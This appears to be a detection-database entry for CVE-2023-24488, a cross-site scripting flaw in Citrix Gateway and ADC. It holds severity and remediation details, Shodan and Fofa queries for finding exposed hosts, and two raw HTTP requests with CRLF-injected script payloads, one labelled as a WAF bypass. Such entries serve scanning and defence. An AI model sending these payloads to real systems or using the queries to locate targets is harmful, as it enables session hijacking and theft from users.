| Title | Citrix Gateway and Citrix ADC - Cross-Site Scripting |
|---|---|
| Author | johnk3r,DhiyaneshDk |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.91357 |
| CVE ID | CVE-2023-24488 |
| CWE ID | CWE-79 |
| Shodan Query | title:"Citrix Gateway"http.title:"citrix gateway" |
| Fofa Query | title="citrix gateway" |
| Tags | cve2023 cve citrix xss adc vkev vuln |
Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.
GET /oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:128.12) Gecko/20100101 Firefox/128.12
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24488.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-24488.pcap
N/AN/A